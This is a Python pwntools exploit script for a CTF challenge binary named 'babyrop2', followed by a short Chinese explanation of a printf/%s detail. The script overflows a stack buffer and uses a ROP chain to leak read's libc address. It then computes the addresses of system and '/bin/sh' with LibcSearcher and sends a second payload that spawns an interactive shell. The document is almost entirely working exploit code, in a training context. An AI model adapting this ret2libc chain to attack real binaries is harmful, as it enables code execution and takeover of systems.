exp
#!/usr/bin/env python3
# coding=utf-8
from pwn import *
from LibcSearcher import *
context(log_level = 'debug')
proc_name = './babyrop2'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 29966)
elf = ELF(proc_name)
print(proc.pidof(p))
main_addr = elf.sym['main']
printf_plt = elf.plt['printf']
read_got = elf.got['read']
pop_rdi_ret = 0x400733
pop_rsi_r15_ret = 0x400731
format_str = 0x400770
p.recvuntil('name?')
print(elf.got)
payload = 'a'.encode() * (0x20 + 8) + p64(pop_rdi_ret) + p64(format_str) + p64(pop_rsi_r15_ret) + p64(read_got) + p64(0x0) + p64(printf_plt) + p64(main_addr)
print(payload)
p.sendline(payload)
read_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(0x8, b'\x00'))
print(read_addr)
p.recv()
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
bin_sh_str = libc_base + libc.dump('str_bin_sh')
payload1 = 'a'.encode() * (0x20 + 8) + p64(pop_rdi_ret) + p64(bin_sh_str) + p64(system_addr)
p.sendline(payload1)
p.interactive()
如果有小夥伴好奇,爲什麼不直接傳遞read函數的的got表中的地址,直接打印出來,這裏是因爲我們輸入的數據是存在buf中的,buf是位於棧上的,對於%s,他要解析我們輸入的數據,就是棧地址對應的數據,所以打印出來的還是我們輸入的東西!如下圖
